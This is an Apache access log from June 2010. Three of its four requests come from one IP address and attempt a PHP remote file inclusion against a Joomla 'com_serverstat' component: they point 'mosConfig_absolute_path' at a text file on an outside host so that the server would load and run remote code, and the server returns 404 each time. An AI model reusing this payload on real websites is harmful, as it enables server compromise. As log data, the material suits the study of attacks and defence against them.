58.230.162.220 - - [01/Jun/2010:03:36:34 -0500] "GET /logs/access_log.1272412800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
195.194.77.202 - - [01/Jun/2010:03:36:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.230.162.220 - - [01/Jun/2010:03:36:37 -0500] "GET /logs/access_log.1272412800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:36:38 -0500] "GET /logs/access_log.1272240000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
